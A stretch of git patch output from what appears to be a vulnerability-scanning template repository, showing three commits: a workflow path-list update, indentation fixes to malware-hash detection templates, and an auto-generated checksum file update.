profiles/default-login.yml:f10a424c61d9a1d411229bc2e35f2bdb2650bedf +profiles/k8s-cluster-security.yml:b35ea16f23e68b75575f1ab3d02c655cebdc46ee profiles/kev.yml:f4fadde36adee86e24778fd0bd00fbcb49a30a4b profiles/misconfigurations.yml:586c1e221434a7afe5295c6e45473cab80632b2d profiles/osint.yml:e2c01c742d5d7bf7ac3599a7c29afdb5dd1c6d90 @@ -8765,7 +8800,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5baecc601c886413c3ac3a85f9323864854ddce0 +templates-checksum.txt:5332914af0f8a4523a11dd057e40477c4edfc628 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c28c3d610a6b5fb8cb6dccdaa2351df0b98d20f3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 25 Jun 2024 09:52:17 +0000 Subject: [PATCH 0603/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 35 ++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e96267dbbb..e1b8f58982 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,40 @@ on: paths: - '.new-additions' - 'cloud/aws/sns/sns-public-subscribe-access.yaml' + - 'cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml' + - 'cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml' + - 'cloud/kubernetes/deployments/k8s-default-namespace-used.yaml' + - 'cloud/kubernetes/deployments/k8s-host-ports-check.yaml' + - 'cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml' + - 'cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml' + - 'cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml' + - 'cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml' + - 'cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml' + - 'cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml' + - 'cloud/kubernetes/deployments/k8s-privileged-container.yaml' + - 'cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml' + - 'cloud/kubernetes/deployments/k8s-root-container-admission.yaml' + - 'cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml' + - 'cloud/kubernetes/kubernetes-code-env.yaml' + - 'cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml' + - 'cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml' + - 'cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml' + - 'cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml' + - 'cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml' + - 'cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml' + - 'cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml' + - 'cloud/kubernetes/pods/k8s-readonly-fs.yaml' + - 'cloud/kubernetes/pods/k8s-readonly-rootfs.yaml' + - 'cloud/kubernetes/pods/k8s-root-user-id.yaml' + - 'cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml' + - 'cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml' + - 'cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml' + - 'cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml' + - 'cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml' + - 'cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml' + - 'cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml' + - 'cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml' + - 'cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml' - 'dast/vulnerabilities/sqli/time-based-sqli.yaml' - 'file/malware/hash/anthem-deeppanda-malware-hash.yaml' - 'file/malware/hash/applejeus-malware-hash.yaml' @@ -107,6 +141,7 @@ on: - 'http/cves/2024/CVE-2024-34982.yaml' - 'http/cves/2024/CVE-2024-3552.yaml' - 'http/cves/2024/CVE-2024-36412.yaml' + - 'http/cves/2024/CVE-2024-36527.yaml' - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/cves/2024/CVE-2024-3922.yaml' From ebddab0351fb710b6200149a82443a5de19faed9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 25 Jun 2024 13:56:35 +0400 Subject: [PATCH 0604/1841] fixed yaml validation errors --- file/malware/hash/blackenergy-driver-amdide-hash.yaml | 2 +- file/malware/hash/naikon-apt-malware-hash.yaml | 2 +- file/malware/hash/petya-ransomware-hash.yaml | 2 +- file/malware/hash/purplewave-malware-hash.yaml | 2 +- file/malware/hash/revil-ransomware-hash.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/file/malware/hash/blackenergy-driver-amdide-hash.yaml b/file/malware/hash/blackenergy-driver-amdide-hash.yaml index a2be5b70fe..d97717f7c3 100644 --- a/file/malware/hash/blackenergy-driver-amdide-hash.yaml +++ b/file/malware/hash/blackenergy-driver-amdide-hash.yaml @@ -7,7 +7,7 @@ info: Detects the AMDIDE driver from BlackEnergy malware reference: - http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/ - tag: malware,blackenergy + tags: malware,blackenergy file: - extensions: diff --git a/file/malware/hash/naikon-apt-malware-hash.yaml b/file/malware/hash/naikon-apt-malware-hash.yaml index 1c2f5697c5..dc1a050adc 100644 --- a/file/malware/hash/naikon-apt-malware-hash.yaml +++ b/file/malware/hash/naikon-apt-malware-hash.yaml @@ -5,7 +5,7 @@ info: severity: info reference: - https://goo.gl/7vHyvh -tags: malware,naikon + tags: malware,naikon file: - extensions: diff --git a/file/malware/hash/petya-ransomware-hash.yaml b/file/malware/hash/petya-ransomware-hash.yaml index 551d7126e9..7540215654 100644 --- a/file/malware/hash/petya-ransomware-hash.yaml +++ b/file/malware/hash/petya-ransomware-hash.yaml @@ -7,7 +7,7 @@ info: Detects Petya Ransomware. reference: - http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html -tags: ransomware,malware + tags: ransomware,malware file: - extensions: diff --git a/file/malware/hash/purplewave-malware-hash.yaml b/file/malware/hash/purplewave-malware-hash.yaml index aa2ece1518..46a7d320fa 100644 --- a/file/malware/hash/purplewave-malware-hash.yaml +++ b/file/malware/hash/purplewave-malware-hash.yaml @@ -6,7 +6,7 @@ info: reference: - https://twitter.com/3xp0rtblog/status/1289125217751781376 - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PurpleWave.yar -tags: malware,apt,purplewave + tags: malware,apt,purplewave file: - extensions: diff --git a/file/malware/hash/revil-ransomware-hash.yaml b/file/malware/hash/revil-ransomware-hash.yaml index c6248e390f..9dba28d848 100644 --- a/file/malware/hash/revil-ransomware-hash.yaml +++ b/file/malware/hash/revil-ransomware-hash.yaml @@ -8,7 +8,7 @@ info: reference: - https://angle.ankura.com/post/102hcny/revix-linux-ransomware - https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Revix.yar -tags: ransomware,malware + tags: ransomware,malware file: - extensions: From 7067300f839a3b6b242a737cd59732751b799145 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 10:23:01 +0000 Subject: [PATCH 0606/1841] Auto Generated Templates Checksum [Tue Jun 25 10:23:01 UTC 2024] :robot: --- templates-checksum.txt | 49 ++++++++++++++++-------------------------- 1 file changed, 19 insertions(+), 30 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f06478f233..7accba0c86 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1290,7 +1290,7 @@ http/cves/2015/CVE-2015-3337.yaml:5abe6c220d4892bc6f3f8839836a7696bc2a3c82 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 http/cves/2015/CVE-2015-3897.yaml:2c99a2568eb635f5e58cd4803bb50ec3482c4d62 http/cves/2015/CVE-2015-4050.yaml:902a93dcdb63a21b6683515c0e1ddf513ce5ddc4 -http/cves/2015/CVE-2015-4062.yaml:8c16e8680fcb2c9c9a9cea48e3dfac365c09fdcd +http/cves/2015/CVE-2015-4062.yaml:2fc66be404564d3489d99706c4da6dfc007a6a07 http/cves/2015/CVE-2015-4063.yaml:73fd1011f479ba835d4e1df949c173e05e3fa187 http/cves/2015/CVE-2015-4074.yaml:3c847a80227020cd12b9d58def71f335ed1ef5d1 http/cves/2015/CVE-2015-4127.yaml:8e3cc35845ff4b07a83527875682fa9fb1c1c226 @@ -1911,7 +1911,6 @@ http/cves/2020/CVE-2020-2036.yaml:9b95369973ccef0d271975b003a660282d40b248 http/cves/2020/CVE-2020-2096.yaml:74f98a3ef057ddeb2f265bb0b77e36877670add4 http/cves/2020/CVE-2020-20982.yaml:538d3beb3a9976144b2a6a10e8fa30af220dd0d4 http/cves/2020/CVE-2020-20988.yaml:639c85d1714dbddbfd9e4b8db0fbce4a5ac90b54 -http/cves/2020/CVE-2020-21012.yaml:03a5be731cfd6bf8b8e6d82c5ee1aded97e6e695 http/cves/2020/CVE-2020-2103.yaml:aba6245af90cad4d38da3566653a918f273b8b58 http/cves/2020/CVE-2020-21224.yaml:4f2ca3879d3b04e607f6ecea52ab9922400edf19 http/cves/2020/CVE-2020-2140.yaml:278c2662d3e3830d9336cb5c74086e11b5e9c97e @@ -1976,7 +1975,6 @@ http/cves/2020/CVE-2020-28871.yaml:5ce59d1a1acbd8433831b49c8e9f3472ec051f06 http/cves/2020/CVE-2020-28976.yaml:828415a9bbd36733fd459751712c303ced1d00fa http/cves/2020/CVE-2020-29164.yaml:b22ac231890e04ebe3bd4842f48b8b75dfa68807 http/cves/2020/CVE-2020-29227.yaml:014575ac4dec53a13f8dd825cff7a84066f0ae9c -http/cves/2020/CVE-2020-29284.yaml:80a4ee991c7571f79905e18861b3dd84a62689b5 http/cves/2020/CVE-2020-29395.yaml:87498f96d897987aa7ab5c436a6525f3b6222810 http/cves/2020/CVE-2020-29453.yaml:39043ce7aaaedd3873e1ca47d0ee94be7a55b005 http/cves/2020/CVE-2020-29583.yaml:89ff719d88a5612f8c90d69298e24b88f1a48cfd @@ -2277,7 +2275,6 @@ http/cves/2021/CVE-2021-28151.yaml:5b7849811af0aac5ac7c68f11984802d5c136327 http/cves/2021/CVE-2021-28164.yaml:5dd4e3ae65a8c4ccc087ee45dc6c1039457fe244 http/cves/2021/CVE-2021-28169.yaml:37da3586f6f8475da6f63596d5cbf578af370502 http/cves/2021/CVE-2021-28377.yaml:0c0306f01abbec5444d522510bc897cea44339c7 -http/cves/2021/CVE-2021-28419.yaml:06dd2715d496bb243207a231a5c63d7b1de18d6f http/cves/2021/CVE-2021-28854.yaml:dd2007f9a927a86fa6765c9534a1259eb3c46f86 http/cves/2021/CVE-2021-28918.yaml:20422a3d75001b729c00e4a3c90e9ed033fb4349 http/cves/2021/CVE-2021-28937.yaml:bd90f9666ffbbd6f1911cf7d3e92bcd7b10db395 @@ -2389,7 +2386,7 @@ http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 http/cves/2021/CVE-2021-39146.yaml:6ced53b90254c74c5a35b67d00c776c1aae0e1d3 http/cves/2021/CVE-2021-39152.yaml:ccbd9449525555e79a34a562ceee2264622470dd -http/cves/2021/CVE-2021-39165.yaml:41cb34053dcde697cdc2743a80c304656985e504 +http/cves/2021/CVE-2021-39165.yaml:302a847b6adcb420f513120028dde316cf5bb479 http/cves/2021/CVE-2021-39211.yaml:4d7f0b468d404e83a4f7317b87ba0e1b0b79265f http/cves/2021/CVE-2021-39226.yaml:d59d4b479bf607b76bc705a325473543be39d0cc http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e @@ -2414,7 +2411,6 @@ http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 http/cves/2021/CVE-2021-40868.yaml:c5c30fe3252bae32bf85e6b63c764d1c219d3cc7 http/cves/2021/CVE-2021-40870.yaml:46d3de8e6493f2e904332956193f0421aff425a3 http/cves/2021/CVE-2021-40875.yaml:ad92995245e69583a64cfa285eeeb43f21cf8774 -http/cves/2021/CVE-2021-40908.yaml:78115ff3db4e03b21cb56370d0c01957d7539d8f http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 http/cves/2021/CVE-2021-40968.yaml:c2ec3b974da0e66945080fd1886c1ff461ad1c43 http/cves/2021/CVE-2021-40969.yaml:0fc2858bf59d512570d1bfcfa70b71e2f0ee7328 @@ -2650,7 +2646,7 @@ http/cves/2022/CVE-2022-2219.yaml:f682b76185ee7e4b14c791de3f406e1200a1873e http/cves/2022/CVE-2022-22242.yaml:5ba8e944ff85f24ce27e54f2ed971fe77d29c0ed http/cves/2022/CVE-2022-22536.yaml:c9a773a1cb114cbc0732fc3d816ceb77f4ef383e http/cves/2022/CVE-2022-22733.yaml:5ec717eb729ca3bfb9bf3dc1ad1e60d1ae6ffba6 -http/cves/2022/CVE-2022-22897.yaml:78b13ac37d27e8538ad8604db367ba10d29ad1d4 +http/cves/2022/CVE-2022-22897.yaml:85a206aa8c2c6ab8b518ee87bf94100865e11090 http/cves/2022/CVE-2022-2290.yaml:969dc774e02e9796b5c5c058809b241124b640a3 http/cves/2022/CVE-2022-22947.yaml:8c8ebad1b68f62dc0b84b4265274461ac3403869 http/cves/2022/CVE-2022-22954.yaml:e7fb1f8aa8ef4dbe1fa04588b921bbbc4ad4c281 @@ -2741,8 +2737,6 @@ http/cves/2022/CVE-2022-27926.yaml:0abf3a04244788da9daecb9ec8a96b0d337677bc http/cves/2022/CVE-2022-27927.yaml:bea706f327a28583fb9c8db4058f93da20e9d66e http/cves/2022/CVE-2022-27984.yaml:4b1de62b597ff3985b35f4c07f808e20b8e3be75 http/cves/2022/CVE-2022-27985.yaml:7de01fef2fe8a799a34cbfa788042f1cbc888287 -http/cves/2022/CVE-2022-28022.yaml:d9e2638306589873983b03d584708ab315752bd1 -http/cves/2022/CVE-2022-28023.yaml:5f9b4c0a096aade433c641f9742fe941b1926a1f http/cves/2022/CVE-2022-28032.yaml:ccb20f87bc6749ecd44f76b965233728b440aafc http/cves/2022/CVE-2022-28079.yaml:94a540cee17e3e49ec31c9e828d5ea1c5bdce435 http/cves/2022/CVE-2022-28080.yaml:b0b5afd63a37bec422bfff70a98268b8c051c55c @@ -2803,10 +2797,6 @@ http/cves/2022/CVE-2022-31975.yaml:1d80466a8bfedc02bacb9b870793a036d0769a40 http/cves/2022/CVE-2022-31976.yaml:e6c75f79cbfb04defaea59a859cfbda40ba39dc4 http/cves/2022/CVE-2022-31977.yaml:b04acc6c53b519736e32ef4d124affae024160eb http/cves/2022/CVE-2022-31978.yaml:d082ccb6e5136465a070be3119ace6a2d590bf98 -http/cves/2022/CVE-2022-31980.yaml:a4baa163ee8e01c4dca72b3481a50bed0a800a2e -http/cves/2022/CVE-2022-31981.yaml:97e53c47baf8d12fc36f09c2c67028340f1d9000 -http/cves/2022/CVE-2022-31982.yaml:14887472d5e8ef45ff5a9e2985f9ce447fc482d2 -http/cves/2022/CVE-2022-31983.yaml:0cc27ef5ed78ddc7970cd851b3bf3d88babf4aff http/cves/2022/CVE-2022-31984.yaml:b6dabf331f1f42e3dfb65cf34469dabc48c5cdb5 http/cves/2022/CVE-2022-32007.yaml:e906645b18647cd54049b516c600dcb45757027f http/cves/2022/CVE-2022-32015.yaml:dfa56cfa49faf125c0eb6a8658b2e4edb2dce48e @@ -2893,7 +2883,7 @@ http/cves/2022/CVE-2022-40047.yaml:2931bef5361cf87ba2274ccc6090dde8328e2440 http/cves/2022/CVE-2022-40083.yaml:333acecbc6c71ec844ded8fbdc5e2de95af9e34e http/cves/2022/CVE-2022-40127.yaml:1c30549f833d342dd280fd26686b3181fb9af4f1 http/cves/2022/CVE-2022-40359.yaml:ddd501f8d916d909938c17ccf6492dc2e2c7d812 -http/cves/2022/CVE-2022-4049.yaml:71b2b7b27ae4951eac04543b6c9bb1a79044079e +http/cves/2022/CVE-2022-4049.yaml:8b7841be211e03d9e978d650806c532268df4680 http/cves/2022/CVE-2022-4050.yaml:054b17311703abba376a3fceb0279ec9e86bbb01 http/cves/2022/CVE-2022-4057.yaml:f9ed01b5d367fe19da6614416acba1eb86ff9fff http/cves/2022/CVE-2022-4059.yaml:1770b6465e74d136837d297e5e2702bd1798dd4d @@ -2999,7 +2989,7 @@ http/cves/2023/CVE-2023-0562.yaml:86e35de0ffd83e90947e7c4b0b49836230bde3bc http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 http/cves/2023/CVE-2023-0600.yaml:fcfb1a40a3cd2e7df90c774102fd125bd335b405 http/cves/2023/CVE-2023-0602.yaml:e31c5d2abf85c2ee480612417a8d6a784ea0c190 -http/cves/2023/CVE-2023-0630.yaml:3e345bf8bc629f39a8cd585c837348d7600981bf +http/cves/2023/CVE-2023-0630.yaml:21ffb9436503bd54caae3db66aacabad37e9c8fe http/cves/2023/CVE-2023-0669.yaml:8b9956b2b579a7e3030f18be3f3d24569cb6733c http/cves/2023/CVE-2023-0678.yaml:425a6993c9f4095a50e255ef189c02c5cbc6c9c2 http/cves/2023/CVE-2023-0777.yaml:5f28117981d93630dd24ebef0d1505b0237eb797 @@ -3114,7 +3104,7 @@ http/cves/2023/CVE-2023-2822.yaml:832b20338fa90959828ef3e67d5e817cd557a8aa http/cves/2023/CVE-2023-2825.yaml:92feef41f6a25642c5215adcb38592b71c0462c9 http/cves/2023/CVE-2023-28343.yaml:0252ea544fae8e4c4601f1ec39ab3d55115cba0f http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 -http/cves/2023/CVE-2023-28662.yaml:479bac6a27b092d0cae76337fbd93fc6dff1e096 +http/cves/2023/CVE-2023-28662.yaml:ecfe56fcccb4b7dce34fe8977ae248ec0bbce103 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a http/cves/2023/CVE-2023-29298.yaml:fc59b893b6d31feebb375289accdccc041d75ac9 @@ -3124,7 +3114,6 @@ http/cves/2023/CVE-2023-29439.yaml:6b4d13d29a6d82c006a51c21b21e1a5b65a5355c http/cves/2023/CVE-2023-2948.yaml:cca097d683e10aa4ad2b35c472a2cdb50272c44c http/cves/2023/CVE-2023-29489.yaml:4f462e0b89b99c9d7023f0387258adafe22916ac http/cves/2023/CVE-2023-2949.yaml:e6f53c4fb713b08bb1a0baf722ed01eecbf5b443 -http/cves/2023/CVE-2023-29622.yaml:e073cdd1cecc1c12f4c15d92cd4b254f931b8717 http/cves/2023/CVE-2023-29623.yaml:45672ad306c134cd72076467059d7986e9967728 http/cves/2023/CVE-2023-2982.yaml:94f463ab73d722e5b527f6d3a9300e93167a364c http/cves/2023/CVE-2023-29827.yaml:ed1ed567978feafa3e17c2a15996c18f9433830a @@ -3134,7 +3123,7 @@ http/cves/2023/CVE-2023-29922.yaml:f0da9a62d02badbf7ac6b2ba807c94a38d666388 http/cves/2023/CVE-2023-29923.yaml:cc106f6716a44a5aeca4a0abedc26408543c85b6 http/cves/2023/CVE-2023-30013.yaml:a7e4c7bc35c13f4d515cd586604b091640fe0594 http/cves/2023/CVE-2023-30019.yaml:717d5bc6c8b2c31bfc2edd5c68bf2052492faaa8 -http/cves/2023/CVE-2023-30150.yaml:1953c3b4cbac3dec6f2f5184d7e112d387311614 +http/cves/2023/CVE-2023-30150.yaml:ab8934d841747f2ee5667726c6bfee382fc12e97 http/cves/2023/CVE-2023-30210.yaml:5813ad5f81384f32da9b1376920592d190809922 http/cves/2023/CVE-2023-30212.yaml:e78558d9584338de17429906728f353dca4265ac http/cves/2023/CVE-2023-30256.yaml:21511c5e34cd98222ff485ca650f32c54ea3464d @@ -3248,7 +3237,7 @@ http/cves/2023/CVE-2023-39600.yaml:7bc52c9f178223c128a174a171353c694429c88e http/cves/2023/CVE-2023-39676.yaml:85436c487f3535f724b8b552987b8564b715a2a4 http/cves/2023/CVE-2023-39677.yaml:379d594ca8bbfea196d292c1856da7eae11b3332 http/cves/2023/CVE-2023-39700.yaml:abd644de09232548601e5d2d693d4c054e1b42a0 -http/cves/2023/CVE-2023-39796.yaml:a729bba89e9885a729b5fd594b78afc93de872b1 +http/cves/2023/CVE-2023-39796.yaml:c5056df9e62c54ba2de50de5a57cf54675abd330 http/cves/2023/CVE-2023-40208.yaml:3bd72bed6969fb8149de3c31b7909d9c88799d1f http/cves/2023/CVE-2023-40355.yaml:7761faee9b0236c926e300d32db3a9508227204d http/cves/2023/CVE-2023-40779.yaml:44138c89024a59d0b0105341177b8d5718ce132f @@ -3281,7 +3270,7 @@ http/cves/2023/CVE-2023-43208.yaml:462628870cee32dc0dccd7ed2d329f54ac90d917 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d -http/cves/2023/CVE-2023-43374.yaml:f65d0fd722479f51ef71a6ea57cdba8cc2e9b4a9 +http/cves/2023/CVE-2023-43374.yaml:c215725a1463355ef54975d0655b2e9872dc7929 http/cves/2023/CVE-2023-43472.yaml:02352f22f7347c7ca98b3eb51d6851fcba2f0b40 http/cves/2023/CVE-2023-43795.yaml:36d3e9de4b3f54d3976afca31c54f6bf5f288b53 http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a @@ -3350,13 +3339,13 @@ http/cves/2023/CVE-2023-6038.yaml:d0598518a34e87b3df39a996dbc2969ae576fad0 http/cves/2023/CVE-2023-6063.yaml:d1e516058338f612347dba91ed13fc5406cb4d7f http/cves/2023/CVE-2023-6065.yaml:9d402d2854231906a58b7fa10219cd189c5c6918 http/cves/2023/CVE-2023-6114.yaml:65353fb14406628586fb741a32c1bf7ec36c46e2 -http/cves/2023/CVE-2023-6360.yaml:4dc28d57d894063fd6a67edf0e29ea2380fad9be +http/cves/2023/CVE-2023-6360.yaml:f6225e8801b4dd10b60548d70b885b15b119820c http/cves/2023/CVE-2023-6379.yaml:9f2ebeef8f2c8d3a3fb9c0e8b49cc3c0c132082d http/cves/2023/CVE-2023-6380.yaml:f4d215b24e29caa45bee7186a98523bad5c7e231 http/cves/2023/CVE-2023-6389.yaml:1442104ed12f70cbab2bdea5effa6e4262a9b95f http/cves/2023/CVE-2023-6505.yaml:84f672dbc2f01d602f46205dd57f62f15dc0e8ed http/cves/2023/CVE-2023-6553.yaml:7a54271ce0dabed297718787b829f3ddc52b256c -http/cves/2023/CVE-2023-6567.yaml:36ddd59d4deab3cab1f59f9bcd8a5e8ddb07d6c0 +http/cves/2023/CVE-2023-6567.yaml:086b5b4e0069279aa73a98c4d6b736d2b3431cfd http/cves/2023/CVE-2023-6623.yaml:00d70a24f04c9124d433cb202bbe6d5feac8db68 http/cves/2023/CVE-2023-6634.yaml:7d6b2f13c31512686f5c947bca522a303557ab7b http/cves/2023/CVE-2023-6786.yaml:6cb37423babfd031e76f3b1d59b8f231c968f2af @@ -3379,7 +3368,7 @@ http/cves/2024/CVE-2024-0713.yaml:b8ebbe918246b345ca0ec9041ff7b1edea36dda0 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-0939.yaml:04b5c41f49b6511cf5cf1af97d3d2d1193532833 http/cves/2024/CVE-2024-1021.yaml:c9be400622968f5464c3aed476c4719ddef81b52 -http/cves/2024/CVE-2024-1061.yaml:96c95b4ca9238cb7c10740394d456ebb9259be24 +http/cves/2024/CVE-2024-1061.yaml:4aeb219e32007f374bc7304f5b33f28a575bc007 http/cves/2024/CVE-2024-1071.yaml:c96b9ae1af3c57ad1d76138972e4ef609468f43c http/cves/2024/CVE-2024-1183.yaml:ffe0544f2ff472a9588380611602503fcd73e340 http/cves/2024/CVE-2024-1208.yaml:080cd48093b2902e76b14bdeddd38bbba9bc18a9 @@ -7952,7 +7941,7 @@ http/vulnerabilities/other/empirecms-xss.yaml:1dd42b3c178c08112a55a795637916ae0a http/vulnerabilities/other/ems-sqli.yaml:5041a04bd1dddfaa7461e369509b318dda871c4d http/vulnerabilities/other/ep-web-cms-xss.yaml:9b9f26659fe3486aeb093bff5874b1f9900df616 http/vulnerabilities/other/epp-server-lfi.yaml:73d70e01fa3888f4152dddbf72025699ec7a7cda -http/vulnerabilities/other/erensoft-sqli.yaml:202a4ab4963f3f0cee35f71f2a13eae5c902ebe8 +http/vulnerabilities/other/erensoft-sqli.yaml:29002dbb52deaf441e9ecb2f14a0ed1414a73278 http/vulnerabilities/other/eris-xss.yaml:4577a38a1df827d27fa7897de54fb081dd48d9d8 http/vulnerabilities/other/etouch-v2-sqli.yaml:0db1cf3824fbb4f52c61900f9dfa14810cbc2919 http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:aa21740a09946f8468031c7af22571eeabf045e3 @@ -8214,7 +8203,7 @@ http/vulnerabilities/other/zzcms-xss.yaml:16bcfdc7025566b60cd5440ea331d5395dd41c http/vulnerabilities/php/php-xdebug-rce.yaml:b50c0de8f5f6590bae1f200c2b6624f69e03e8ce http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28c7e8 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 -http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4 +http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:8ac2b34f7a77e3ee8f5d3e5e4ea4b32017033fd3 http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:f312a1b2cfdd69d925a4615ab8773c60121c49af http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:5eb3b6305e550c1b5e589d7b8c2f64337cd25190 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a @@ -8293,7 +8282,7 @@ http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml:9061b5a5e6523f698d8 http/vulnerabilities/ueditor/ueditor-ssrf.yaml:6d255515d772049bbc3acf2eda7a486357d23ee7 http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9ecb785 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:3aefc2073f08e855dec0c8146b728b692ce654f2 -http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:5e3cb2ac4a3259c35592098294ad49ef31b87efe +http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:7e581989b879ce1f3c9ddf609b85ddff43ae4f16 http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml:5565f8dcc7d5ad169422fd7e698c0399f79ab961 http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:286dda2cca7b4e62e4c1a76eed1c5dfcf7d6495d http/vulnerabilities/videoxpert-lfi.yaml:1aa4c4a1048489e9343348c0e436a2917c4edcf9 @@ -8453,7 +8442,7 @@ http/vulnerabilities/wordpress/wp-all-export-xss.yaml:835dab6e7769a010535ff599f8 http/vulnerabilities/wordpress/wp-altair-listing.yaml:8b4bcd2bb94c42e26f654308a73865b836402b96 http/vulnerabilities/wordpress/wp-ambience-xss.yaml:5b23993a7619230252ea0f5addb6398b4166e2c1 http/vulnerabilities/wordpress/wp-arforms-listing.yaml:1d6ff4f881b4fe560e40f931659518449cec25d6 -http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:0b39e0694f6d40f67f887dbd6cfe2e5405bf1d83 +http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:569569c9fd2f082b0398450fbc5424c79b5c7446 http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:caf5f60512f9b2d1d1881ab49f20cf0ceed1890a http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:d3ed04f7ea1318cc872d77ee4fe3aad813041b0a http/vulnerabilities/wordpress/wp-config-setup.yaml:d5a639e548f566b597f91aa5fa36bef2f836b8a6 @@ -8504,7 +8493,7 @@ http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml:6c308e55d5505e420ea6b1 http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml:0ba95fd6c7ab7739be4858037e18fc8abbf16d97 http/vulnerabilities/wordpress/wp-socialfit-xss.yaml:daf38a1b0feff473061c164faf94222d82e622aa http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:1ba6d305a15be605674cbbc799bd7e9160823a87 